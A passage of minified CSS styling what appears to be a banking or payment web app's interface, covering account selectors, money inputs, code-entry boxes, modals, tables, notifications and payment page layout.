img{width:16px;height:16px;margin-top:4px}.custom-radio .label-radio{color:#9EB3C9;padding-left:8px}.custom-radio input:checked ~ .label-radio{color:#005993}.wrap-input-select .account-option{border-bottom:1px dashed #C9D9EA;padding:8px 0px}.wrap-input-select .account-option__info{display:flex;justify-content:space-between;font-weight:500}.wrap-input-select .account-option__balance{display:block;font-size:14px;line-height:20px;font-weight:normal}.wrap-input-select .line-top{position:sticky;width:calc(100% - 32px);height:1px;background:#005993;top:0;left:16px}.wrap-input-select .custom-select{font-weight:normal;color:#062A46}.wrap-input-select .custom-select.s-small{font-size:14px;line-height:20px}.wrap-input-select .custom-select.s-small .cus-option{padding-top:8px;padding-bottom:8px}.wrap-input-select .custom-select.s-medium{font-size:16px;line-height:24px}.wrap-input-select .custom-select.s-medium .cus-option{padding-top:12px;padding-bottom:12px}.wrap-input-select .custom-select.s-large{font-size:18px;line-height:28px}.wrap-input-select .custom-select.s-large .cus-option{padding-top:14px;padding-bottom:14px}.wrap-input-select .custom-select .cus-option{padding:0;font-size:16px;font-weight:500;line-height:22px}.wrap-input-select .custom-select .cus-option img{margin-right:12px}.wrap-input-select .hint{color:#EA114E;margin-top:8px}.wrap-input-select .hint.normal{color:#9EB3C9}.input-fill-group .hint{color:#EA114E;margin-top:8px}.input-fill-group .hint.normal{color:#9EB3C9}.input-fill-group .wrap-input{position:relative}.input-fill-group .wrap-input .icon-pre{position:absolute;left:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);margin-left:16px}.input-fill-group .wrap-input .icon-pre ~ input{padding-left:44px}.input-fill-group .wrap-input .icon-postfix{position:absolute;right:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);padding:12px 14px}.input-fill-group .wrap-input .icon-postfix img{max-width:24px;max-height:24px}.input-fill-group .wrap-input input{border:1px solid #C9D9EA;outline:none;padding:0 12px 0 16px;width:100%;color:#062A46;border-radius:0;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}.input-fill-group .wrap-input input::placeholder{color:#9EB3C9;font-size:14px;font-weight:400;line-height:20px}.input-fill-group .wrap-input input:focus{border-color:#005993}.input-fill-group .wrap-input input:disabled{background-color:#F4F8FB;color:#062A46;border-color:#C9D9EA}.input-fill-group .wrap-input input:read-only{border-color:#C9D9EA !important}.input-fill-group .icon-clear{width:24px;height:24px;cursor:pointer}.input-fill-group.input-fill-small input{font-weight:500;font-size:14px;line-height:18px;padding-top:8px;padding-bottom:8px;padding-right:40px}.input-fill-group.input-fill-small .icon-clear{width:16px;height:16px}.input-fill-group.input-fill-medium input{font-weight:500;font-size:16px;line-height:22px;padding-top:12px;padding-bottom:12px;padding-right:52px}.input-fill-group.input-fill-large input{font-weight:500;font-size:16px;line-height:22px;padding-top:16px;padding-bottom:16px;padding-right:52px}.input-fill-group.error input{border-color:#EA114E;color:#FFB8C2}.wrap-input-code.outline-style{width:100%}.wrap-input-code.outline-style .input-code input{-webkit-box-flex:1;-ms-flex:1;flex:1;width:32px;height:32px;border:none;border-bottom:1px solid #C9D9EA;background-color:transparent}.wrap-input-code.error input{border-color:#EA114E}.wrap-input-code.center{display:flex;justify-content:center;align-items:center;flex-direction:column}.wrap-input-code__container{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start}.wrap-input-code__container.center{justify-content:center}.wrap-input-code__container>*:not(:first-child){margin-left:16px}@media screen and (max-width: 1023px){.wrap-input-code__container>*:not(:first-child){margin-left:8px}.wrap-input-code__container input{width:32px;height:32px}}.wrap-input-code__container>div{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-negative:0;flex-shrink:0;-ms-flex-preferred-size:calc((100% - 80px) / 6);flex-basis:calc((100% - 80px) / 6);position:relative;max-width:48px}.wrap-input-code__container>div::after{content:'';display:block;height:0}.wrap-input-code__container input{padding-bottom:25%;padding-top:25%;width:100% !important;height:100%;display:block;text-align:center;font-size:16px;font-weight:500;line-height:22px;outline:none;border:1px solid #C9D9EA;color:#062A46;border-radius:0;-moz-appearance:textfield}.wrap-input-code__container input::-webkit-outer-spin-button,.wrap-input-code__container input::-webkit-inner-spin-button{-webkit-appearance:none;margin:0}.wrap-input-code__container input:focus::-webkit-input-placeholder{opacity:0;color:#c2d4e7}.wrap-input-code__container input:focus::-moz-placeholder{opacity:0;color:#c2d4e7}.wrap-input-code__container input:focus:-ms-input-placeholder{opacity:0;color:#c2d4e7}.wrap-input-code__container input:focus::-ms-input-placeholder{opacity:0;color:#c2d4e7}.wrap-input-code__container input:focus::placeholder{opacity:0;color:#c2d4e7}.wrap-input-code .hint{color:#EA114E;margin-top:8px;text-align:left}.wrap-input-code .hint.normal{color:#9EB3C9}.wrap-input-code .hint.center{text-align:center}.cus-textarea .hint{color:#EA114E;margin-top:8px}.cus-textarea .hint.normal{color:#9EB3C9}.cus-textarea.no-borer textarea{border:none !important}.cus-textarea.error .wrap-textarea textarea{border-color:#EA114E}.cus-textarea .wrap-textarea{position:relative}.cus-textarea .wrap-textarea .icon-pre{position:absolute;left:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);margin-left:16px}.cus-textarea .wrap-textarea .icon-pre ~ textarea{padding-left:44px}.cus-textarea .wrap-textarea .icon-postfix{position:absolute;right:0;top:-4px;padding:12px}.cus-textarea .wrap-textarea .icon-postfix img{max-width:24px;max-height:24px}.cus-textarea .wrap-textarea textarea{display:block;border:1px solid #C9D9EA;outline:none;padding:8px 16px;width:100%;color:#062A46}.cus-textarea .wrap-textarea textarea::placeholder{color:#9EB3C9;font-size:14px;font-weight:400;line-height:28px}.cus-textarea .wrap-textarea textarea:focus{border-color:#005993}.cus-textarea .wrap-textarea textarea:disabled{background-color:#F4F8FB;color:#062A46;border-color:#C9D9EA}.cus-textarea .icon-clear{width:24px;height:24px;cursor:pointer}.cus-textarea textarea{font-family:"SVN-Gilroy";min-height:48px}.cus-textarea.error input{border-color:#EA114E;color:#FFB8C2}.format-account-option{border-bottom:1px dashed #C9D9EA;padding:16px 0px;color:#062A46}.format-account-option:hover{color:#005993}.format-account-option__info{display:flex;justify-content:space-between}.format-bond-option{border-bottom:1px dashed #C9D9EA;padding:16px 0px;color:#062A46}.format-bond-option:hover{color:#005993}.format-bond-option__info{display:flex;justify-content:space-between}.hoz-menu{position:relative;-webkit-box-shadow:inset 0 -1px 0 0 #9EB3C9;-moz-box-shadow:inset 0 -1px 0 0 #9EB3C9;box-shadow:inset 0 -1px 0 0 #9EB3C9;overflow:hidden}.hoz-menu-slider{position:relative}.hoz-menu-slider .menu-item{cursor:pointer;position:relative;white-space:nowrap;flex-shrink:0;min-width:auto;background-color:transparent;white-space:nowrap;color:#9EB3C9}.hoz-menu-slider .menu-item:not(:last-child){border-right:none}.hoz-menu-slider .menu-item:not(:first-child)::after{content:'';position:absolute;height:12px;width:1px;background-color:#757575;left:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%)}.hoz-menu-slider .menu-item *{pointer-events:none}.hoz-menu-slider .menu-item img{width:24px}.hoz-menu-slider .menu-item.active{color:#000}.hoz-menu-slider .menu-item.active::before{content:'';display:block;position:absolute;bottom:0;left:0;width:100%;height:2px;background-color:#EA114E}.hoz-menu-btn{position:absolute;top:50%;transform:translateY(-50%);left:0;height:100%;width:40px;display:inline-flex;align-items:center;justify-content:center;background:linear-gradient(to left, rgba(255,255,255,0), #F4F8FB 40%);cursor:pointer;z-index:1}.hoz-menu-btn.right{left:auto;right:0;transform:translateY(-50%) rotateZ(180deg)}.hoz-menu-btn .arrow-left,.hoz-menu-btn .arrow-right{border:solid #005993;border-width:0 2.5px 2.5px 0;display:inline-block;padding:2.5px;transform:rotate(135deg)}.hoz-menu-scroll{position:relative;overflow:auto;border-radius:10px 10px 0 0;-ms-overflow-style:none;scrollbar-width:none}@media (hover: none) and (pointer: coarse){.hoz-menu-scroll{overflow:auto}}.hoz-menu-scroll::-webkit-scrollbar{display:none}.iframe-service{width:100%;height:100%;min-height:600px;border-radius:0;border:none;outline:none;box-shadow:none}.iframe-service__wrap{height:100%;width:100%}.reminder-toast button{display:block;margin-left:auto;margin-top:8px}.count-time-reminder{font-weight:bold}.input-contact{position:relative;background-color:#fff}.input-contact.open .input-contact__input__icon{background-color:#F4F8FB}.input-contact.open .input-contact__input input{border-color:#005993}.input-contact.error .input-contact__input input{border-color:#EA114E}.input-contact__input{position:relative}.input-contact__input input{height:48px;width:100%;border:1px solid #C9D9EA;padding:8px 48px 8px 16px;font-size:16px;font-weight:500;line-height:24px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}.input-contact__input input:focus{border-color:#005993}.input-contact__input__icon{cursor:pointer;width:48px;height:calc(100% - 2px);position:absolute;right:1px;top:1px;display:flex;align-items:center;justify-content:center}.input-contact__input__icon::before{content:'';position:absolute;top:50%;left:0;transform:translateY(-50%);width:1px;height:calc(100% - 24px);background-color:#C9D9EA}.input-contact__input__icon img{width:24px;height:24px}.input-contact__contact{background-color:#fff;margin-top:4px;width:100%;max-height:240px;position:absolute;top:100%;left:0;border:1px solid #005993;overflow-y:auto;z-index:1;font-size:16px;font-weight:500;line-height:24px}.input-contact__search{position:relative}.input-contact__search input{width:100%;height:48px;border:none;padding:0 48px 0 16px;font-size:16px;font-weight:500;line-height:24px}.input-contact__search::after{content:'';position:absolute;bottom:0;left:16px;width:calc(100% - 32px);height:1px;background-color:#005993}.input-contact__search img{position:absolute;width:24px;height:24px;right:12px;top:12px}.input-contact__item{padding:16px;cursor:pointer;position:relative}.input-contact__item:hover{color:#1A73AB}.input-contact__item:not(:first-child)::after{content:'';position:absolute;top:0;left:16px;width:calc(100% - 32px);height:1px;border-top:1px dashed #C9D9EA}.input-contact__empty{font-size:14px;font-weight:400;line-height:20px;color:#9EB3C9;height:48px;display:flex;align-items:center;justify-content:center}.input-contact__error-message{font-size:14px;font-weight:400;line-height:20px;color:#EA114E;margin-top:8px}.input-money{position:relative}.input-money:focus{outline:none}.input-money__input{width:100%;display:flex;flex-flow:row;border:1px solid #C9D9EA;align-items:center;justify-content:space-between;background-color:#fff;padding:0 16px}.input-money__input .icon-clear{margin-left:10px;margin-right:-2px;cursor:pointer}.input-money__input.active:not(.disabled){border:1px solid #005993}.input-money__input:focus{outline:none}.input-money__input input{color:#062A46;font-weight:500;border:none;width:100%;min-width:0;padding:12px 0;outline:none;font-size:16px;line-height:22px;background-color:transparent;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}.input-money__input input::placeholder{font-weight:300 !important}.input-money__input--currency{display:inline-block;height:100%;color:#9EB3C9;font-weight:600;line-height:normal}.input-money__input.disabled{background-color:#F4F8FB;color:#062A46;border-color:#C9D9EA}.input-money__input.error{border:1px solid #EA114E}.input-money__translate-text{color:#9EB3C9;font-size:14px;line-height:20px;margin-top:8px}.input-money .hint{margin-top:8px;color:#EA114E}.language-switch{cursor:pointer;display:flex;align-items:center;flex-direction:row;justify-content:center}.language-switch.disabled{opacity:0.5;cursor:not-allowed}.link{color:#005993}.link.underline:hover{text-decoration:underline}.n-link{cursor:default}.list{width:100%;display:grid;grid-template-columns:max-content auto;border-bottom:1px dashed #C9D9EA}.list>*{padding:14px 0;border-bottom:1px dashed #C9D9EA;display:flex;flex-direction:column;justify-content:center}.list .label{padding-right:30px;max-width:250px}.list .value{position:relative}.list-item{display:flex;flex-flow:row;justify-content:flex-start;align-items:center}.list-item__translate-money{padding-left:20px;color:#9EB3C9}.list-item .icon-arrow{cursor:pointer;padding-left:20px}.list-item .icon-arrow img{width:24px;height:24px}.red{color:#EE2E63 !important}.blue{color:#005993 !important}.green{color:#4CB944}.vt-loading span{display:inline-block;margin:0 2px;padding:6px;background:red;border-radius:100%;-webkit-animation-name:loadingDot;animation-name:loadingDot;-webkit-animation-duration:1500ms;animation-duration:1500ms;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite;-webkit-animation-timing-function:linear;animation-timing-function:linear}.vt-loading span:nth-child(1){background-color:#5bbbe0}.vt-loading span:nth-child(2){background-color:#26afe4;-webkit-animation-delay:0.2s;animation-delay:0.2s}.vt-loading span:nth-child(3){background-color:#0074a0;-webkit-animation-delay:0.4s;animation-delay:0.4s}.vt-loading span:nth-child(4){background-color:#b90000;-webkit-animation-delay:0.6s;animation-delay:0.6s}.vt-loading span:nth-child(5){background-color:#ff3d3d;-webkit-animation-delay:0.8s;animation-delay:0.8s}@-webkit-keyframes loadingDot{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}40%{-webkit-transform:scale(2.5);-ms-transform:scale(2.5);transform:scale(2.5);opacity:.3}60%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}}@-moz-keyframes loadingDot{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}40%{-webkit-transform:scale(2.5);-ms-transform:scale(2.5);transform:scale(2.5);opacity:.3}60%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}}@-ms-keyframes loadingDot{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}40%{-webkit-transform:scale(2.5);-ms-transform:scale(2.5);transform:scale(2.5);opacity:.3}60%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}}@-o-keyframes loadingDot{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}40%{-webkit-transform:scale(2.5);-ms-transform:scale(2.5);transform:scale(2.5);opacity:.3}60%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}}@keyframes loadingDot{0%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}40%{-webkit-transform:scale(2.5);-ms-transform:scale(2.5);transform:scale(2.5);opacity:.3}60%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:1}}.modal-list.modal-content{padding:32px;width:614px;border-radius:10px;background-color:#fff;position:relative}.modal-list__close{cursor:pointer;position:absolute;top:24px;right:24px}.modal-list__title{font-size:20px;font-weight:600;line-height:30px;margin-bottom:16px}.modal-list__list{font-size:16px;font-weight:400;line-height:24px;margin-top:24px}.modal-list__item{cursor:pointer}.modal-list__item img{margin-right:8px}.modal-list__item:not(:first-child){margin-top:24px}.chart{overflow-x:auto;padding-bottom:20px;font-size:12px;display:flex}.chart .title_wrapper_mobile{display:none}@media screen and (max-width: 1023px){.chart .title_wrapper_mobile{display:block;z-index:999;color:#757575;width:60px;position:fixed;background-color:#fff;padding-bottom:30px}.chart .title_wrapper_mobile .title{margin-bottom:8px}.chart .title_wrapper_mobile .lineX0{min-width:60px;height:8px}.chart .title_wrapper_mobile .lineX0 span{float:right;transform:translate(50%, 50%)}}.chart .title_wrapper{z-index:999;width:100px;color:#757575}@media screen and (max-width: 1023px){.chart .title_wrapper{display:none}}.chart .title_wrapper .title{margin-bottom:8px}.chart .title_wrapper .lineX0{min-width:100px;height:8px}.chart .title_wrapper .lineX0 span{float:right;transform:translate(50%, 50%)}.chart .bar_wrapper{width:100%;padding-bottom:5px}@media screen and (max-width: 1023px){.chart .bar_wrapper{min-width:700px;padding-left:5px;position:relative;left:60px}}.chart .bar_wrapper .barRow{display:flex;margin-bottom:8px}.chart .bar_wrapper .barRow .bar{background:linear-gradient(90deg, #005993 36.46%, #EA114E 96.25%),#C4C4C4}.chart .bar_wrapper .barRow .barValue{padding-left:8px}.chart .bar_wrapper .lineX_wrapper{display:flex;width:calc(100% - 100px)}.chart .bar_wrapper .lineX_wrapper .lineX{width:20%;height:8px;border-right:1px solid #000;border-top:1px solid #000}.chart .bar_wrapper .lineX_wrapper .lineX .rootLineX{float:left;transform:translate(-50%, 50%)}.chart .bar_wrapper .lineX_wrapper .lineX span{float:right;transform:translate(50%, 50%)}.chart .bar_wrapper .lineX_wrapper .lineX:first-child{border-left:1px solid #000}.confirm-card-modal .modal-container{max-width:616px}.confirm-card{overflow:hidden}.confirm-card-modal .modal-container{width:100%;max-width:616px}.confirm-card__card-info{padding-top:64px;position:relative;overflow:hidden;pointer-events:none}.confirm-card__card-info>*{margin:auto;border:1px solid #FFB8C2;text-align:left}.confirm-card__card-info:before{content:'';position:absolute;background:#005993;width:120%;height:380px;top:0;left:-10%;border-radius:40%;transform:translateY(-50%)}.confirm-card__content{padding:32px;padding-bottom:56px;text-align:center}.confirm-card__content .content__actions{margin-top:40px}.confirm-card__content .content__actions>*:not(:first-child){margin-left:16px}.modal-content__footer{display:flex;align-items:center;justify-content:space-between;padding:24px 32px 32px 32px}.modal-content__footer--options{display:flex;justify-content:space-around}.modal-content__head{display:flex;width:100%;justify-content:space-between;align-items:center;padding:28px 32px}.modal-content__head--info{display:flex;flex-flow:column}.modal-statement.modal-content{padding:32px;width:614px;border-radius:10px;background-color:#fff;position:relative}.modal-statement__close{cursor:pointer;position:absolute;top:24px;right:24px}.modal-statement__title{font-size:20px;font-weight:600;line-height:30px}.modal-statement__list{font-size:16px;font-weight:400;line-height:24px;margin-top:24px}.modal-statement__item{cursor:pointer}.modal-statement__item img{margin-right:8px}.modal-statement__item:not(:first-child){margin-top:24px}.modal{position:fixed;z-index:888;display:none;left:0;top:0;overflow:auto;min-width:375px}.modal.modal-show{background:rgba(0,0,0,0.5);height:100%;width:100%;display:block}.modal .modal-container{margin:32px auto;min-height:calc(100% - 64px);display:flex;align-items:center;width:100%;max-width:808px}.modal .modal-content{width:100%;background:#fff;border-radius:10px;-webkit-box-shadow:0px 8px 30px rgba(56,107,138,0.19);-moz-box-shadow:0px 8px 30px rgba(56,107,138,0.19);box-shadow:0px 8px 30px rgba(56,107,138,0.19)}.modal .modal-content.wrap-modal-confirm{width:auto;margin:auto}.modal-confirm{color:#062A46;width:100%;padding:32px 72px;max-width:521px;text-align:center}.modal-confirm .close-icon{position:absolute;right:16px;top:16px}.modal-confirm .message{white-space:pre-line}.modal-confirm .message .alignLeft{text-align:left}@media screen and (max-width: 1023px){.modal .modal-container{padding:0 16px}.modal .modal-confirm{padding:32px}.modal .modal-confirm button{min-width:auto}}.new-select-number{position:relative}.new-select-number .vt-select__dropdown-indicator{pointer-events:none}.new-select-number__hint{margin-top:8px;color:#EA114E}.new-select-number .select-no-option{color:#9EB3C9;padding:14px 16px}.new-select-number .cus-option{padding-top:12px;padding-bottom:12px;word-break:break-word;font-size:16px;font-weight:500;line-height:22px}.new-select-number--item{border-bottom:1px dashed #C9D9EA;padding:8px 0px}.new-select-number--item__info{display:flex;justify-content:space-between;font-weight:500}.new-select-number--item__balance{display:block;font-size:14px;line-height:20px;font-weight:normal}.new-select-number-select{display:block;width:100%;background-color:#fff;position:relative}.new-select-number-label-group{background-color:#fff;border:1px solid #C9D9EA;border-top:0px;border-bottom:0px}.new-select-number-label-group.error{border-color:#EE2E63}.new-select-number-label-group.error .select-number--inner:last-child{border-bottom-color:#EE2E63}.new-select-number-label-group .select-number--inner{padding:12px 16px 10px;border-bottom:1px solid #C9D9EA}.new-select-number-label-group .select-number--inner-item{width:100%;display:flex}.new-select-number-label-group .select-number--inner-item :nth-child(1){flex-grow:1}.new-select-number-label-group .select-number--inner-item :nth-child(2){flex-shrink:0;text-align:right}.new-select-number-label-group .select-number--inner-item:not(:first-child){margin-top:8px}@media screen and (min-width: 1024px){.new-select-number .vt-select__single-value .cus-option{overflow:hidden;white-space:nowrap;text-overflow:ellipsis}}@media screen and (max-width: 1023px){.new-select-number .vt-select__single-value{top:0 !important;position:static !important;transform:none !important;white-space:pre-wrap !important}.new-select-number .vt-select__single-value .cus-option{padding:0 !important}}.cms-main-zone{flex:1 1 auto}.cms-main-zone .cms-table{overflow:hidden;width:100%;position:relative}.cms-main-zone.full-border{border-bottom:none}.cms-main-zone.full-border .cms-table tbody tr td{border:1px solid #C9D9EA}.cms-main-zone.full-border .cms-table tbody tr td:last-child{border-right-width:2px}.cms-main-zone.no-background tbody tr{background-color:white}.cms-main-zone.error .cms-table-row.head,.cms-main-zone.error .cms-table-row:last-child{border-bottom:1px solid #EA114E}.cms-table-col{flex:1 1;padding:16px 8px;overflow:hidden}.cms-table-col.disabled{background-color:#E7EEF3;color:#9EB3C9}.cms-table-icon{width:16px;margin:0 4px;vertical-align:text-top}.table-mobile{display:none}@media screen and (max-width: 1023px){.table-mobile{display:block;border-top:1px solid #C9D9EA;border-bottom:1px solid #C9D9EA}.table-mobile.error{border-top-color:#EA114E;border-bottom-color:#EA114E}.table-mobile__row{padding:0 16px;position:relative;overflow:hidden}.table-mobile__row>*{padding:8px 0}.table-mobile__row>* .item-label{flex-basis:50%;min-width:50%;overflow:hidden;padding-right:4px;text-transform:uppercase}.table-mobile__row>* .item-value{flex-basis:50%;min-width:50%;text-align:right;overflow:hidden;padding-left:4px;word-break:break-word}.table-mobile__row:nth-of-type(odd){background-color:#F4F8FB}}.table-actions--mobile{position:absolute;transform:translateX(100%);top:0;right:0;height:100%;align-items:center;padding-left:60px;padding-right:16px;background-image:linear-gradient(to left, #fff 75%, transparent);transition:transform .3s ease-in-out}.table-actions--mobile.active{transform:translateX(0)}.table-mobile__dots{display:block;margin-left:auto;padding:16px 8px 8px;transform:translateX(16px)}.table-responsive .table-mobile{display:none}@media screen and (max-width: 1023px){.table-responsive .cms-main-zone{display:none}.table-responsive .table-mobile{display:block;border-top:1px solid #C9D9EA;border-bottom:1px solid #C9D9EA}.table-responsive .table-mobile__row{padding:0 16px}.table-responsive .table-mobile__row>*{padding:8px 0}.table-responsive .table-mobile__row>* .item-label{flex-basis:60%;overflow:hidden;padding-right:4px}.table-responsive .table-mobile__row>* .item-value{flex-basis:40%;text-align:right;overflow:hidden;padding-left:4px}.table-responsive .table-mobile__row:nth-of-type(odd){background-color:#F4F8FB}}tbody .cms-table-row:first-child{border-top:1px solid transparent}tbody .cms-table-row:last-of-type{border-bottom:none}.cms-table-row{position:relative;background-color:#fff;border:none;-webkit-transition:background-color 0.3s;-moz-transition:background-color 0.3s;-o-transition:background-color 0.3s;transition:background-color 0.3s}.cms-table-row:nth-of-type(odd){background-color:#F4F8FB}.cms-table-row.head{border-bottom:1px solid #C9D9EA;background-color:#fff;text-transform:uppercase;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}.cms-table-row.head .cms-table-col{white-space:pre-wrap;vertical-align:baseline}.cms-table-row.head.pin td{top:0;z-index:1;position:sticky;background-color:#fff;-webkit-box-shadow:inset 0 -1px 0px 0px #E7EEF3;-moz-box-shadow:inset 0 -1px 0px 0px #E7EEF3;box-shadow:inset 0 -1px 0px 0px #E7EEF3}.cms-table-row .action-col{cursor:default;opacity:-20;position:relative;width:0px;padding:0;overflow:visible}.cms-table-row .action-col .wrap-action{display:flex;align-items:center;position:absolute;height:100%;top:0;right:0;padding-left:24px;padding-right:16px;-webkit-transform:translateX(100%);-ms-transform:translateX(100%);transform:translateX(100%);-webkit-transition:all 300ms cubic-bezier(0, 0.74, 0.58, 1);-moz-transition:all 300ms cubic-bezier(0, 0.74, 0.58, 1);-o-transition:all 300ms cubic-bezier(0, 0.74, 0.58, 1);transition:all 300ms cubic-bezier(0, 0.74, 0.58, 1);background:inherit;background:-moz-linear-gradient(to right,rgba(244,248,251,0) 0%,rgba(244,248,251,0.75) 25%,#f4f8fb 50%,#f4f8fb 100%);background:-webkit-gradient(to right,rgba(244,248,251,0) 0%,rgba(244,248,251,0.75) 25%,#f4f8fb 50%,#f4f8fb 100%);background:-webkit-linear-gradient(to right,rgba(244,248,251,0) 0%,rgba(244,248,251,0.75) 25%,#f4f8fb 50%,#f4f8fb 100%);background:-o-linear-gradient(to right,rgba(244,248,251,0) 0%,rgba(244,248,251,0.75) 25%,#f4f8fb 50%,#f4f8fb 100%);background:-ms-linear-gradient(to right,rgba(244,248,251,0) 0%,rgba(244,248,251,0.75) 25%,#f4f8fb 50%,#f4f8fb 100%);background:linear-gradient(to right,rgba(244,248,251,0) 0%,rgba(244,248,251,0.75) 25%,#f4f8fb 50%,#f4f8fb 100%)}.cms-table-row .action-col.action-col-ie{opacity:1;width:auto}.cms-table-row .action-col.action-col-ie .wrap-action{transform:none;position:relative;background:transparent}.cms-table-row:not(.head):hover{box-shadow:0px 8px 15px rgba(124,158,177,0.1);background-color:#E7EEF3}.cms-table-row:not(.head):hover:nth-of-type(odd){background-color:#E7EEF3}.cms-table-row:not(.head):hover .action-col{opacity:1}.cms-table-row:not(.head):hover .action-col .wrap-action{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}.notify-popup{top:40px;width:450px;right:-16px;z-index:1;position:absolute}.notify-popup .notify-container{position:relative}.notify-popup .notify-container .corner{top:-2px;right:5px;display:inline-block;position:absolute;border-left:17px solid #fff;border-right:17px solid transparent;border-bottom:17px solid transparent;-webkit-box-shadow:-30px -30px 30px rgba(0,89,147,0.18);-moz-box-shadow:-30px -30px 30px rgba(0,89,147,0.18);box-shadow:-30px -30px 30px rgba(0,89,147,0.18);-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg)}.notify-popup .popup-content{overflow-x:hidden;overflow-y:auto;max-height:70vh;background:#fff;border-radius:10px;-webkit-box-shadow:0px 4px 30px rgba(0,89,147,0.18);-moz-box-shadow:0px 4px 30px rgba(0,89,147,0.18);box-shadow:0px 4px 30px rgba(0,89,147,0.18)}.notify-popup .notify-item{width:100%;height:100%;display:flex;padding:8px 0;flex-direction:row;border-bottom:1px solid #C9D9EA}.notify-popup .notify-item .image{width:72px;height:72px;min-width:72px;border-radius:4px;background-size:cover}.notify-popup .notify-item .content{flex:1 1 auto;display:flex;padding-left:12px;flex-direction:column;justify-content:space-between}.notify-popup .notify-item .content .time{color:#9EB3C9}.notify-popup .notify-item .status{flex:0 0 20px;display:flex;align-items:center;flex-direction:row;justify-content:flex-end}.notify-popup .notify-item .status .new{width:4px;height:4px;border-radius:50%;background-color:#EA114E}.notify-bell-wrapper{position:relative}.notify-bell-wrapper .ring{-webkit-animation:ring 4s 0.1s ease-in-out infinite;animation:ring 4s 0.1s ease-in-out infinite}.notify-bell-wrapper .notify-num{position:absolute;width:15px;height:15px;border-radius:50%;background:#EA114E;top:-3px;left:10px;line-height:15px;text-align:center;font-style:normal;font-weight:500;font-size:10px;color:#fff}.paper{background-color:#fff}.paper-shadow1{-webkit-box-shadow:0px 8px 10px rgba(32,71,101,0.05);-moz-box-shadow:0px 8px 10px rgba(32,71,101,0.05);box-shadow:0px 8px 10px rgba(32,71,101,0.05)}.paper-rounded{border-radius:10px}.payment-layout__body{display:flex;flex-direction:column;min-height:360px;padding:0 32px 48px}.payment-layout__body.background-only{background-color:#F4F8FB}.payment-layout__body.background-gray{background-size:contain;background-position:center;background-repeat:no-repeat;background-image:url("/static/image/logo/logonotext-transparent.png");background-size:300px;background-color:#F4F8FB}.payment-layout__body.background-gray .payment-row:nth-child(1) .payment-column:nth-child(2){padding-right:152px}.payment-layout__body__footer{padding-top:32px;margin-bottom:-32px}.payment-layout__body__footer>:not(:first-child){padding-top:8px}.payment-layout__body__footer2{padding-top:32px;margin-top:32px;margin-bottom:-32px}.payment-layout__body__footer2>:not(:first-child){padding-top:8px}.payment-layout__body__accept-message{font-size:16px;font-weight:400;line-height:24px}.payment-layout__body__notice{color:#9EB3C9;margin-bottom:-8px}@media screen and (max-width: 1023px){.payment-layout__body{padding-left:16px;padding-right:16px}.payment-layout__body.background-gray .payment-row:nth-child(1) .payment-column:nth-child(2){padding-right:0}}.payment-column{white-space:pre-wrap;word-break:break-word;text-overflow:ellipsis;align-items:flex-start;overflow:hidden}.payment-column.center{align-items:center}.payment-column:nth-of-type(1){flex-basis:30%;font-size:16px;font-weight:400;line-height:24px}.payment-column:nth-of-type(2){flex:1;font-size:16px;font-weight:500;line-height:22px}.payment-column:not(:first-child){margin-left:16px}@media screen and (max-width: 1023px){.payment-column:not(:first-child){margin-left:0}}.payment-footer{padding:32px 0;margin:0 32px;display:flex;flex-direction:row;align-items:center;justify-content:space-between}.payment-footer.border-top{border-top:1px solid #C9D9EA}.payment-footer__left,.payment-footer__right{display:flex;flex-direction:row;align-items:center}.payment-footer__left>*:not(:first-child),.payment-footer__right>*:not(:first-child){margin-left:16px}.payment-footer__left .btn--fit,.payment-footer__right .btn--fit{padding-left:0 !important;padding-right:0 !important;min-width:auto !important}.payment-footer__left .btn--fit img,.payment-footer__right .btn--fit img{margin-right:4px !important}@media screen and (max-width: 1023px){.payment-footer{margin:0 16px;flex-direction:column-reverse;align-items:stretch}.payment-footer__right{display:flex;flex-direction:column-reverse}.payment-footer__left{justify-content:center;margin-top:16px}.payment-footer__left:empty{margin-top:0}.payment-footer__right>button,.payment-footer__left>button{display:block;margin-left:0 !important;width:100%}.payment-footer__right>button:not(:first-child),.payment-footer__left>button:not(:first-child){margin-bottom:16px}}.payment-header{padding:24px 32px;position:relative;display:flex;flex-wrap:wrap}.payment-header>*{flex:1 0 50%}.payment-header__bank-contact{text-align:right}.payment-header__bank-contact--phone{color:#005993}.payment-header__transaction{margin-top:24px}.payment-header__transaction--success{color:#41A43A}.payment-header.has-qrcode .payment-header__transaction{padding-right:152px}.payment-header__subNotice{white-space:pre-line;padding-top:8px}.payment-header__qrcode{position:absolute;bottom:-48px;right:32px;display:flex;width:120px}.payment-header__qrcode__box{width:100%;padding-top:100%;position:relative}.payment-header__qrcode__box>*{position:absolute;top:0;left:0;max-width:100%;max-height:100%}@media screen and (max-width: 1023px){.payment-header{padding:24px 